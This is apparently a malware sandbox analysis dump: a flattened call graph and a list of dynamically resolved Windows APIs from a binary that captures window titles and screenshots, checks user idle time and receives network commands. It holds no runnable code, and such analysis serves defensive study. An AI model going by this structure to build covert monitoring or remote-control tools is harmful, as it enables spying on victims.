53653 4032c9 53653->53614 53654->53653 53655 4028e8 28 API calls 53654->53655 53655->53653 53657 4024f9 53656->53657 53658 40250a 28 API calls 53657->53658 53659 4020b1 53658->53659 53659->53621 53671 4051ef 53660->53671 53662 406391 53675 402055 53662->53675 53665 402f10 53707 401fb0 53665->53707 53667 402f1e 53668 402055 11 API calls 53667->53668 53669 402f2d 53668->53669 53669->53634 53670->53637 53672 4051fb 53671->53672 53681 405274 53672->53681 53674 405208 53674->53662 53676 402061 53675->53676 53677 4023ce 11 API calls 53676->53677 53678 40207b 53677->53678 53703 40267a 53678->53703 53682 405282 53681->53682 53683 405288 53682->53683 53684 40529e 53682->53684 53692 4025f0 53683->53692 53686 4052f5 53684->53686 53687 4052b6 53684->53687 53701 4028a4 22 API calls 53686->53701 53690 4028e8 28 API calls 53687->53690 53691 40529c 53687->53691 53690->53691 53691->53674 53693 402888 22 API calls 53692->53693 53694 402602 53693->53694 53695 402672 53694->53695 53696 402629 53694->53696 53702 4028a4 22 API calls 53695->53702 53699 4028e8 28 API calls 53696->53699 53700 40263b 53696->53700 53699->53700 53700->53691 53704 40268b 53703->53704 53705 4023ce 11 API calls 53704->53705 53706 40208d 53705->53706 53706->53665 53708 4025f0 28 API calls 53707->53708 53709 401fbd 53708->53709 53709->53667 53710->53571 53712 41bb46 GetForegroundWindow GetWindowTextW 53711->53712 53713 40417e 53712->53713 53714 404186 53713->53714 53719 402252 53714->53719 53716 404191 53723 4041bc 53716->53723 53720 40225c 53719->53720 53721 4022ac 53719->53721 53720->53721 53727 402779 11 API calls std::_Deallocate 53720->53727 53721->53716 53724 4041c8 53723->53724 53728 4041d9 53724->53728 53726 40419c 53726->53488 53727->53721 53729 4041e9 53728->53729 53730 404206 53729->53730 53731 4041ef 53729->53731 53745 4027e6 53730->53745 53735 404267 53731->53735 53734 404204 53734->53726 53736 402888 22 API calls 53735->53736 53737 40427b 53736->53737 53738 404290 53737->53738 53739 4042a5 
53737->53739 53756 4042df 22 API calls 53738->53756 53740 4027e6 28 API calls 53739->53740 53744 4042a3 53740->53744 53742 404299 53757 402c48 22 API calls 53742->53757 53744->53734 53746 4027ef 53745->53746 53747 402851 53746->53747 53748 4027f9 53746->53748 53764 4028a4 22 API calls 53747->53764 53751 402802 53748->53751 53752 402815 53748->53752 53758 402aea 53751->53758 53754 402813 53752->53754 53755 402252 11 API calls 53752->53755 53754->53734 53755->53754 53756->53742 53757->53744 53759 402af4 __EH_prolog 53758->53759 53765 402e45 22 API calls 53759->53765 53761 402252 11 API calls 53763 402bce 53761->53763 53762 402b60 53762->53761 53763->53754 53765->53762 53766->53593 53767->53598 53768->53600 53769 1000c7a7 53770 1000c7be 53769->53770 53775 1000c82c 53769->53775 53770->53775 53779 1000c7e6 GetModuleHandleA 53770->53779 53771 1000c872 53772 1000c835 GetModuleHandleA 53774 1000c83f 53772->53774 53774->53774 53774->53775 53775->53771 53775->53772 53780 1000c7ef 53779->53780 53786 1000c82c 53779->53786 53789 1000c803 53780->53789 53782 1000c872 53783 1000c835 GetModuleHandleA 53784 1000c83f 53783->53784 53784->53784 53784->53786 53786->53782 53786->53783 53790 1000c809 53789->53790 53791 1000c82c 53790->53791 53792 1000c80d VirtualProtect 53790->53792 53794 1000c872 53791->53794 53795 1000c835 GetModuleHandleA 53791->53795 53792->53791 53793 1000c81c VirtualProtect 53792->53793 53793->53791 53796 1000c83f 53795->53796 53796->53791 53797 43bea8 53800 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 53797->53800 53798 43bec2 53813 44062d 20 API calls _abort 53798->53813 53800->53798 53801 43beec 53800->53801 53808 445909 EnterCriticalSection 53801->53808 53803 43bec7 pre_c_initialization ___scrt_is_nonwritable_in_current_image 53804 43bef7 53809 43bf98 53804->53809 53808->53804 53810 43bfa6 53809->53810 53810->53810 53812 43bf02 53810->53812 53815 4497ec 37 API calls 2 library calls 53810->53815 53814 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 
53812->53814 53813->53803 53814->53803 53815->53810 53816 4458c8 53818 4458d3 53816->53818 53819 4458fc 53818->53819 53820 4458f8 53818->53820 53822 448b04 53818->53822 53829 445920 DeleteCriticalSection 53819->53829 53830 44854a 53822->53830 53825 448b49 InitializeCriticalSectionAndSpinCount 53828 448b34 53825->53828 53827 448b60 53827->53818 53837 43502b 53828->53837 53829->53820 53831 448576 53830->53831 53832 44857a 53830->53832 53831->53832 53833 44859a 53831->53833 53844 4485e6 53831->53844 53832->53825 53832->53828 53833->53832 53835 4485a6 GetProcAddress 53833->53835 53836 4485b6 __crt_fast_encode_pointer 53835->53836 53836->53832 53838 435036 IsProcessorFeaturePresent 53837->53838 53839 435034 53837->53839 53841 435078 53838->53841 53839->53827 53851 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53841->53851 53843 43515b 53843->53827 53845 448607 LoadLibraryExW 53844->53845 53850 4485fc 53844->53850 53846 448624 GetLastError 53845->53846 53847 44863c 53845->53847 53846->53847 53848 44862f LoadLibraryExW 53846->53848 53849 448653 FreeLibrary 53847->53849 53847->53850 53848->53847 53849->53850 53850->53831 53851->53843 53852 41e04e 53853 41e063 ctype ___scrt_get_show_window_mode 53852->53853 53854 41e266 53853->53854 53871 432f55 21 API calls new 53853->53871 53860 41e21a 53854->53860 53866 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53854->53866 53857 41e277 53857->53860 53867 432f55 21 API calls new 53857->53867 53859 41e213 ___scrt_get_show_window_mode 53859->53860 53872 432f55 21 API calls new 53859->53872 53862 41e2b0 ___scrt_get_show_window_mode 53862->53860 53868 4335db 53862->53868 53864 41e240 ___scrt_get_show_window_mode 53864->53860 53873 432f55 21 API calls new 53864->53873 53866->53857 53867->53862 53874 4334fa 53868->53874 53870 4335e3 53870->53860 53871->53859 53872->53864 53873->53854 53875 433513 53874->53875 53879 433509 53874->53879 
53875->53879 53880 432f55 21 API calls new 53875->53880 53877 433534 53877->53879 53881 4338c8 CryptAcquireContextA 53877->53881 53879->53870 53880->53877 53882 4338e9 CryptGenRandom 53881->53882 53884 4338e4 53881->53884 53883 4338fe CryptReleaseContext 53882->53883 53882->53884 53883->53884 53884->53879 53885 426c6d 53891 426d42 recv 53885->53891 53892 4161ee 53893 401e65 22 API calls 53892->53893 53894 4161f9 53893->53894 53936 43bb2c 53894->53936 53897 401e65 22 API calls 53898 416214 53897->53898 53899 4020f6 28 API calls 53898->53899 53900 41621e 53899->53900 53901 416265 53900->53901 53902 416236 53900->53902 53904 401e65 22 API calls 53901->53904 53903 401e65 22 API calls 53902->53903 53905 41623b 53903->53905 53906 41626a 53904->53906 53907 4020f6 28 API calls 53905->53907 53908 4020f6 28 API calls 53906->53908 53909 416246 53907->53909 53910 416275 53908->53910 53912 4020f6 28 API calls 53909->53912 53911 4020f6 28 API calls 53910->53911 53913 416284 53911->53913 53914 416255 53912->53914 53915 4187aa 147 API calls 53913->53915 53987 4187aa 53914->53987 53917 416261 53915->53917 53918 401e65 22 API calls 53917->53918 53919 41629e 53918->53919 53920 43bb2c _strftime 40 API calls 53919->53920 53921 4162ab 53920->53921 53922 401e65 22 API calls 53921->53922 53923 4162c0 53922->53923 53924 43bb2c _strftime 40 API calls 53923->53924 53925 4162cd 53924->53925 53940 418977 53925->53940 53928 4170c4 53930 401e8d 11 API calls 53928->53930 53929 401fd8 11 API calls 53929->53928 53931 4170cd 53930->53931 53932 401fd8 11 API calls 53931->53932 53933 4170d9 53932->53933 53934 401fd8 11 API calls 53933->53934 53935 4170e5 53934->53935 53937 43bb45 _strftime 53936->53937 54048 43ae83 53937->54048 53939 416206 53939->53897 53941 402093 28 API calls 53940->53941 53942 418992 53941->53942 54118 418eb1 CreateDCA CreateCompatibleDC 53942->54118 53944 4189ac 53945 4189bb 53944->53945 53946 4189da 53944->53946 53947 4020f6 28 API calls 53945->53947 53948 4020df 11 API calls 
53946->53948 53949 4189cc 53947->53949 53950 4189e2 53948->53950 53951 404aa1 61 API calls 53949->53951 53952 4189e7 53950->53952 53953 418a18 53950->53953 53955 4189d5 53951->53955 54167 418c87 53952->54167 54236 418acd 53953->54236 53961 401fd8 11 API calls 53955->53961 53960 401fe2 28 API calls 53964 418a31 53960->53964 53962 418aba 53961->53962 53965 401fd8 11 API calls 53962->53965 53967 401fd8 11 API calls 53964->53967 53968 4162d6 53965->53968 53966 401fd8 11 API calls 53969 418a16 53966->53969 53967->53969 53968->53928 53968->53929 54249 41be87 28 API calls 53969->54249 53971 418a62 54250 406362 28 API calls 53971->54250 53973 418a6e 53974 402f10 28 API calls 53973->53974 53975 418a79 53974->53975 53976 402f10 28 API calls 53975->53976 53977 418a83 53976->53977 53978 404aa1 61 API calls 53977->53978 53979 418a8d 53978->53979 53980 401fd8 11 API calls 53979->53980 53981 418a97 53980->53981 53982 401fd8 11 API calls 53981->53982 53983 418a9f 53982->53983 53984 401fd8 11 API calls 53983->53984 53985 418aaa 53984->53985 53986 401fd8 11 API calls 53985->53986 53986->53955 54290 401fc0 53987->54290 53990 401fc0 28 API calls 53991 4187db 53990->53991 53992 418800 ___scrt_get_show_window_mode 53991->53992 53993 4187f1 GdiplusStartup 53991->53993 54294 4194ff 53992->54294 53993->53992 53998 401f09 11 API calls 53999 41883e 53998->53999 54000 41884b 53999->54000 54001 404e26 99 API calls 53999->54001 54314 418e83 DeleteDC 54000->54314 54001->54000 54003 418850 54004 40482d 3 API calls 54003->54004 54005 418857 54004->54005 54006 41885b 54005->54006 54007 4048c8 97 API calls 54005->54007 54008 404e26 99 API calls 54006->54008 54009 418867 54007->54009 54010 418872 54008->54010 54009->54006 54011 418877 54009->54011 54014 401fd8 11 API calls 54010->54014 54315 404be5 CreateThread 54011->54315 54013 418881 54017 418899 54013->54017 54018 41891c 54013->54018 54015 41895f 54014->54015 54016 401fd8 11 API calls 54015->54016 54019 41896b 54016->54019 54316 41bd4f 28 API 
calls 54017->54316 54021 402f31 28 API calls 54018->54021 54019->53917 54022 418934 54021->54022 54024 402f10 28 API calls 54022->54024 54023 4188a0 54317 41bc1f 54023->54317 54026 41893e 54024->54026 54028 404aa1 61 API calls 54026->54028 54047 41891a 54028->54047 54029 402f31 28 API calls 54030 4188c8 54029->54030 54031 402ea1 28 API calls 54030->54031 54033 4188d4 54031->54033 54032 401fd8 11 API calls 54032->54010 54034 402f10 28 API calls 54033->54034 54035 4188e0 54034->54035 54036 402ea1 28 API calls 54035->54036 54037 4188ea 54036->54037 54038 404aa1 61 API calls 54037->54038 54039 4188f4 54038->54039 54040 401fd8 11 API calls 54039->54040 54041 4188ff 54040->54041 54042 401fd8 11 API calls 54041->54042 54043 418908 54042->54043 54044 401fd8 11 API calls 54043->54044 54045 418911 54044->54045 54046 401fd8 11 API calls 54045->54046 54046->54047 54047->54032 54064 43ba8a 54048->54064 54050 43aed0 54070 43a837 54050->54070 54051 43ae95 54051->54050 54052 43aeaa 54051->54052 54063 43aeaf pre_c_initialization 54051->54063 54069 44062d 20 API calls _abort 54052->54069 54056 43aedc 54057 43af0b 54056->54057 54078 43bacf 40 API calls __Tolower 54056->54078 54058 43af77 54057->54058 54079 43ba36 20 API calls 2 library calls 54057->54079 54080 43ba36 20 API calls 2 library calls 54058->54080 54061 43b03e _strftime 54061->54063 54081 44062d 20 API calls _abort 54061->54081 54063->53939 54065 43baa2 54064->54065 54066 43ba8f 54064->54066 54065->54051 54082 44062d 20 API calls _abort 54066->54082 54068 43ba94 pre_c_initialization 54068->54051 54069->54063 54071 43a854 54070->54071 54072 43a84a 54070->54072 54071->54072 54083 448295 GetLastError 54071->54083 54072->54056 54074 43a875 54104 4483e4 36 API calls __Getctype 54074->54104 54076 43a88e 54105 448411 36 API calls __cftof 54076->54105 54078->54056 54079->54058 54080->54061 54081->54063 54082->54068 54084 4482b7 54083->54084 54085 4482ab 54083->54085 54107 445b74 20 API calls 3 library calls 54084->54107 54106 
44883c 11 API calls 2 library calls 54085->54106 54088 4482b1 54088->54084 54090 448300 SetLastError 54088->54090 54089 4482c3 54091 4482cb 54089->54091 54114 448892 11 API calls 2 library calls 54089->54114 54090->54074 54108 446802 54091->54108 54093 4482e0 54093->54091 54096 4482e7 54093->54096 54095 4482d1 54097 44830c SetLastError 54095->54097 54115 448107 20 API calls _abort 54096->54115 54116 446175 36 API calls 4 library calls 54097->54116 54099 4482f2 54101 446802 _free 20 API calls 54099->54101 54103 4482f9 54101->54103 54102 448318 54103->54090 54103->54097 54104->54076 54105->54072 54106->54088 54107->54089 54109 44680d HeapFree 54108->54109 54110 446836 __dosmaperr 54108->54110 54109->54110 54111 446822 54109->54111 54110->54095 54117 44062d 20 API calls _abort 54111->54117 54113 446828 GetLastError 54113->54110 54114->54093 54115->54099 54116->54102 54117->54113 54251 419360 54118->54251 54120 418eec 54121 418f13 54120->54121 54256 4193a2 GetMonitorInfoW 54120->54256 54123 418f71 54121->54123 54254 4193d8 GetMonitorInfoW 54121->54254 54124 402093 28 API calls 54123->54124 54166 418f7d 54124->54166 54127 418f8a SelectObject 54130 418fa5 StretchBlt 54127->54130 54131 418f96 DeleteDC DeleteDC 54127->54131 54128 418f5e DeleteDC DeleteDC 54129 418f6b DeleteObject 54128->54129 54129->54123 54130->54131 54132 418fce 54130->54132 54131->54129 54134 418fd5 GetCursorInfo 54132->54134 54135 41904f 54132->54135 54134->54135 54136 418fec GetIconInfo 54134->54136 54137 419099 GetObjectA 54135->54137 54139 419062 BitBlt 54135->54139 54140 419089 54135->54140 54136->54135 54138 419002 DeleteObject DeleteObject DrawIcon 54136->54138 54137->54131 54142 4190b1 LocalAlloc 54137->54142 54138->54135 54139->54137 54140->54137 54143 419154 GlobalAlloc 54142->54143 54144 41914a 54142->54144 54143->54131 54145 419196 GetDIBits 54143->54145 54144->54143 54146 4191d3 54145->54146 54147 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54145->54147 54148 4020df 11 API calls 
54146->54148 54147->54123 54149 41920f 54148->54149 54150 4020df 11 API calls 54149->54150 54151 41921b 54150->54151 54152 40250a 28 API calls 54151->54152 54153 41922b 54152->54153 54154 40250a 28 API calls 54153->54154 54155 419248 54154->54155 54156 40250a 28 API calls 54155->54156 54157 41926a 54156->54157 54158 41927b DeleteObject GlobalFree DeleteDC 54157->54158 54159 4192a0 54158->54159 54160 41929d DeleteDC 54158->54160 54161 402055 11 API calls 54159->54161 54160->54159 54162 4192af 54161->54162 54163 401fd8 11 API calls 54162->54163 54164 4192bb 54163->54164 54165 401fd8 11 API calls 54164->54165 54165->54166 54166->53944 54257 418bca 54167->54257 54169 418c9c 54170 418cb9 54169->54170 54171 418cae 54169->54171 54173 418da5 54170->54173 54174 418cc4 54170->54174 54270 418e83 DeleteDC 54171->54270 54176 418d32 54173->54176 54273 418e83 DeleteDC 54173->54273 54174->54176 54177 418ce1 54174->54177 54178 418d4b 54174->54178 54175 418cb3 54182 418eb1 59 API calls 54175->54182 54179 402055 11 API calls 54176->54179 54271 418e83 DeleteDC 54177->54271 54272 418e83 DeleteDC 54178->54272 54184 418e6d 54179->54184 54188 418cfa 54182->54188 54185 401fd8 11 API calls 54184->54185 54189 418a05 54185->54189 54186 418d50 54190 418eb1 59 API calls 54186->54190 54187 418dc4 54191 418eb1 59 API calls 54187->54191 54192 401fe2 28 API calls 54188->54192 54227 401fe2 54189->54227 54193 418d64 54190->54193 54194 418dd8 54191->54194 54195 418d05 54192->54195 54196 401fe2 28 API calls 54193->54196 54197 401fe2 28 API calls 54194->54197 54198 401fd8 11 API calls 54195->54198 54199 418d6f 54196->54199 54200 418de3 54197->54200 54201 418d0e 54198->54201 54202 401fd8 11 API calls 54199->54202 54203 401fd8 11 API calls 54200->54203 54204 418acd 35 API calls 54201->54204 54205 418d78 54202->54205 54206 418dec 54203->54206 54207 418d1e 54204->54207 54208 418bca 35 API calls 54205->54208 54209 418bca 35 API calls 54206->54209 54210 401fe2 28 API calls 54207->54210 54211 418d83 
54208->54211 54212 418df7 54209->54212 54213 418d29 54210->54213 54214 401fe2 28 API calls 54211->54214 54215 401fe2 28 API calls 54212->54215 54216 401fd8 11 API calls 54213->54216 54217 418d8d 54214->54217 54218 418e01 54215->54218 54216->54176 54219 401fd8 11 API calls 54217->54219 54220 401fd8 11 API calls 54218->54220 54219->54176 54221 418e0a 54220->54221 54221->54176 54222 418acd 35 API calls 54221->54222 54223 418e27 54222->54223 54224 401fe2 28 API calls 54223->54224 54225 418e32 54224->54225 54226 401fd8 11 API calls 54225->54226 54226->54176 54228 401ff1 54227->54228 54229 402039 54227->54229 54230 4023ce 11 API calls 54228->54230 54229->53966 54231 401ffa 54230->54231 54232 40203c 54231->54232 54233 402015 54231->54233 54234 40267a 11 API calls 54232->54234 54287 403098 28 API calls 54233->54287 54234->54229 54237 418af0 54236->54237 54238 418af8 SHCreateMemStream 54237->54238 54288 418691 GdipLoadImageFromStream 54238->54288 54240 418b0c 54241 4192c9 23 API calls 54240->54241 54242 418b1a SHCreateMemStream 54241->54242 54243 418706 GdipSaveImageToStream 54242->54243 54244 418b62 54243->54244 54245 40520c 28 API calls 54244->54245 54246 418b7b 54245->54246 54289 4186b4 GdipDisposeImage 54246->54289 54248 418a27 54248->53960 54249->53971 54250->53973 54252 436f10 ___scrt_get_show_window_mode 54251->54252 54253 41937e EnumDisplaySettingsW 54252->54253 54253->54120 54255 418f48 CreateCompatibleBitmap 54254->54255 54255->54127 54255->54128 54256->54121 54258 418bdc 54257->54258 54259 418be4 SHCreateMemStream 54258->54259 54274 418691 GdipLoadImageFromStream 54259->54274 54261 418bf8 54275 4192c9 54261->54275 54263 418c06 SHCreateMemStream 54282 418706 GdipSaveImageToStream 54263->54282 54265 418c22 54266 40520c 28 API calls 54265->54266 54267 418c3b 54266->54267 54284 4186b4 GdipDisposeImage 54267->54284 54269 418c7d 54269->54169 54270->54175 54271->54175 54272->54186 54273->54187 54274->54261 54285 41874f GdipGetImageEncodersSize 54275->54285 54277 4192eb 
54278 43bda0 new 21 API calls 54277->54278 54281 4192f1 54277->54281 54279 419300 54278->54279 54279->54281 54286 418758 GdipGetImageEncoders 54279->54286 54281->54263 54283 418726 54282->54283 54283->54265 54284->54269 54285->54277 54286->54281 54287->54229 54288->54240 54289->54248 54291 401fd2 54290->54291 54292 401fc9 54290->54292 54291->53990 54322 4025e0 28 API calls 54292->54322 54323 401f86 54294->54323 54297 4195f1 EnumDisplayDevicesW 54298 418828 54297->54298 54299 419542 EnumDisplayDevicesW 54297->54299 54305 401f13 54298->54305 54300 41956a 54299->54300 54300->54297 54301 40417e 28 API calls 54300->54301 54303 401f09 11 API calls 54300->54303 54304 4195be EnumDisplayDevicesW 54300->54304 54327 403014 54300->54327 54301->54300 54303->54300 54304->54300 54306 401f22 54305->54306 54313 401f6a 54305->54313 54307 402252 11 API calls 54306->54307 54308 401f2b 54307->54308 54309 401f6d 54308->54309 54311 401f46 54308->54311 54310 402336 11 API calls 54309->54310 54310->54313 54368 40305c 28 API calls 54311->54368 54313->53998 54314->54003 54315->54013 54369 404c01 54315->54369 54316->54023 54574 441ed1 54317->54574 54320 402093 28 API calls 54321 4188bb 54320->54321 54321->54029 54322->54291 54324 401f8e 54323->54324 54325 402252 11 API calls 54324->54325 54326 401f99 EnumDisplayMonitors 54325->54326 54326->54297 54332 403222 54327->54332 54329 403022 54336 403262 54329->54336 54333 40322e 54332->54333 54342 403618 54333->54342 54335 40323b 54335->54329 54337 40326e 54336->54337 54338 402252 11 API calls 54337->54338 54339 403288 54338->54339 54364 402336 54339->54364 54343 403626 54342->54343 54344 403644 54343->54344 54345 40362c 54343->54345 54347 40365c 54344->54347 54348 40369e 54344->54348 54353 4036a6 54345->54353 54351 4027e6 28 API calls 54347->54351 54352 403642 54347->54352 54362 4028a4 22 API calls 54348->54362 54351->54352 54352->54335 54354 402888 22 API calls 54353->54354 54355 4036b9 54354->54355 54356 40372c 54355->54356 54357 4036de 
54355->54357 54363 4028a4 22 API calls 54356->54363 54360 4027e6 28 API calls 54357->54360 54361 4036f0 54357->54361 54360->54361 54361->54352 54365 402347 54364->54365 54366 402252 11 API calls 54365->54366 54367 4023c7 54366->54367 54367->54300 54368->54313 54372 404c10 54369->54372 54373 4020df 11 API calls 54372->54373 54374 404c27 54373->54374 54375 4020df 11 API calls 54374->54375 54381 404c30 54375->54381 54376 43bda0 new 21 API calls 54376->54381 54378 4020b7 28 API calls 54378->54381 54379 404ca1 54382 404e26 99 API calls 54379->54382 54380 401fe2 28 API calls 54380->54381 54381->54376 54381->54378 54381->54379 54381->54380 54383 401fd8 11 API calls 54381->54383 54390 404b96 54381->54390 54396 404cc3 54381->54396 54384 404ca8 54382->54384 54383->54381 54385 401fd8 11 API calls 54384->54385 54386 404cb1 54385->54386 54387 401fd8 11 API calls 54386->54387 54388 404c0f 54387->54388 54391 404ba0 WaitForSingleObject 54390->54391 54392 404bcd recv 54390->54392 54408 421107 54 API calls 54391->54408 54393 404be0 54392->54393 54393->54381 54395 404bbc SetEvent 54395->54393 54397 4020df 11 API calls 54396->54397 54407 404cde 54397->54407 54398 404e13 54399 401fd8 11 API calls 54398->54399 54400 404e1c 54399->54400 54400->54381 54401 4041a2 28 API calls 54401->54407 54402 401fe2 28 API calls 54402->54407 54403 401fd8 11 API calls 54403->54407 54404 4020f6 28 API calls 54404->54407 54405 401fc0 28 API calls 54406 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 54405->54406 54406->54407 54409 415b25 54406->54409 54407->54398 54407->54401 54407->54402 54407->54403 54407->54404 54407->54405 54408->54395 54410 4020f6 28 API calls 54409->54410 54411 415b47 SetEvent 54410->54411 54412 415b5c 54411->54412 54488 4041a2 54412->54488 54415 4020f6 28 API calls 54416 415b86 54415->54416 54417 4020f6 28 API calls 54416->54417 54418 415b98 54417->54418 54491 41beac 54418->54491 54421 415bc1 GetTickCount 54424 41bc1f 28 API calls 54421->54424 54422 415d20 54485 
415d11 54422->54485 54486 415d34 54422->54486 54423 401e8d 11 API calls 54425 4170cd 54423->54425 54426 415bd2 54424->54426 54428 401fd8 11 API calls 54425->54428 54513 41bb77 GetLastInputInfo GetTickCount 54426->54513 54430 4170d9 54428->54430 54432 401fd8 11 API calls 54430->54432 54431 415bde 54434 41bc1f 28 API calls 54431->54434 54433 4170e5 54432->54433 54435 415be9 54434->54435 54436 41bb27 30 API calls 54435->54436 54437 415bf7 54436->54437 54438 41bdaf 28 API calls 54437->54438 54439 415c05 54438->54439 54440 401e65 22 API calls 54439->54440 54441 415c13 54440->54441 54442 402f31 28 API calls 54441->54442 54443 415c21 54442->54443 54444 402ea1 28 API calls 54443->54444 54445 415c30 54444->54445 54446 402f10 28 API calls 54445->54446 54447 415c3f 54446->54447 54448 402ea1 28 API calls 54447->54448 54449 415c4e 54448->54449 54450 402f10 28 API calls 54449->54450 54451 415c5a 54450->54451 54452 402ea1 28 API calls 54451->54452 54453 415c64 54452->54453 54454 404aa1 61 API calls 54453->54454 54455 415c73 54454->54455 54456 401fd8 11 API calls 54455->54456 54457 415c7c 54456->54457 54458 401fd8 11 API calls 54457->54458 54459 415c88 54458->54459 54460 401fd8 11 API calls 54459->54460 54461 415c94 54460->54461 54462 401fd8 11 API calls 54461->54462 54463 415ca0 54462->54463 54464 401fd8 11 API calls 54463->54464 54465 415cac 54464->54465 54466 401fd8 11 API calls 54465->54466 54467 415cb8 54466->54467 54468 401f09 11 API calls 54467->54468 54469 415cc1 54468->54469 54470 401fd8 11 API calls 54469->54470 54471 415cca 54470->54471 54472 401fd8 11 API calls 54471->54472 54473 415cd3 54472->54473 54474 401e65 22 API calls 54473->54474 54475 415cde 54474->54475 54476 43bb2c _strftime 40 API calls 54475->54476 54477 415ceb 54476->54477 54478 415cf0 54477->54478 54479 415d16 54477->54479 54481 415d09 54478->54481 54482 415cfe 54478->54482 54480 401e65 22 API calls 54479->54480 54480->54422 54515 404f51 54481->54515 54514 404ff4 82 API calls 54482->54514 54485->54423 
54530 4050e4 84 API calls 54486->54530 54487 415d04 54487->54485 54531 40423a 54488->54531 54492 4020df 11 API calls 54491->54492 54512 41bebf 54492->54512 54493 41bf2f 54494 401fd8 11 API calls 54493->54494 54495 41bf61 54494->54495 54496 401fd8 11 API calls 54495->54496 54499 41bf69 54496->54499 54497 41bf31 54500 4041a2 28 API calls 54497->54500 54498 4041a2 28 API calls 54498->54512 54501 401fd8 11 API calls 54499->54501 54502 41bf3d 54500->54502 54505 415ba1 54501->54505 54503 401fe2 28 API calls 54502->54503 54506 41bf46 54503->54506 54504 401fe2 28 API calls 54504->54512 54505->54421 54505->54422 54505->54485 54507 401fd8 11 API calls 54506->54507 54509 41bf4e 54507->54509 54508 401fd8 11 API calls 54508->54512 54510 41cec5 28 API calls 54509->54510 54510->54493 54512->54493 54512->54497 54512->54498 54512->54504 54512->54508 54537 41cec5 54512->54537 54513->54431 54514->54487 54516 404f65 54515->54516 54517 404fea 54515->54517 54518 404f6e 54516->54518 54519 404fc0 CreateEventA CreateThread 54516->54519 54520 404f7d GetLocalTime 54516->54520 54517->54485 54518->54519 54519->54517 54570 405150 54519->54570 54521 41bc1f 28 API calls 54520->54521 54522 404f91 54521->54522 54569 4052fd 28 API calls 54522->54569 54530->54487 54532 404243 54531->54532 54533 4023ce 11 API calls 54532->54533 54534 40424e 54533->54534 54535 402569 28 API calls 54534->54535 54536 4041b5 54535->54536 54536->54415 54538 41ced2 54537->54538 54539 41cf31 54538->54539 54543 41cee2 54538->54543 54540 41cf4b 54539->54540 54541 41d071 28 API calls 54539->54541 54557 41d1d7 28 API calls 54540->54557 54541->54540 54545 41cf1a 54543->54545 54548 41d071 54543->54548 54556 41d1d7 28 API calls 54545->54556 54547 41cf2d 54547->54512 54550 41d079 54548->54550 54549 41d0ab 54549->54545 54550->54549 54551 41d0af 54550->54551 54554 41d093 54550->54554 54568 402725 22 API calls 54551->54568 54558 41d0e2 54554->54558 54556->54547 54557->54547 54559 41d0ec __EH_prolog 54558->54559 54560 402717 22 API 

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
